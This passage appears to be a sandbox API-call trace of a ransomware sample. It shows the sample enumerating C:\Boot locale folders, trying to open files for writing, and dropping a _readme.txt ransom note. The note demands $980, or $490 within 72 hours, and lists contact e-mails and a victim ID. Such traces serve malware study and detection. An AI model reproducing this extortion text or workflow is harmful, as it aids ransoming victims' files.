out: hHeap=0x2c0000) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.581] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0201.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.581] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.581] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.581] PathFindFileNameW (pszPath="") returned="" [0201.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.581] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.582] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.582] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.582] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.582] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0201.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.582] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0201.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.583] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.583] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.583] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.583] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.584] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0201.584] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.584] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.584] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.584] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.586] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0201.587] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.587] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.587] PathFindFileNameW (pszPath="") returned="" [0201.587] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.587] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.587] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.587] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.588] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0201.588] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0201.588] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is 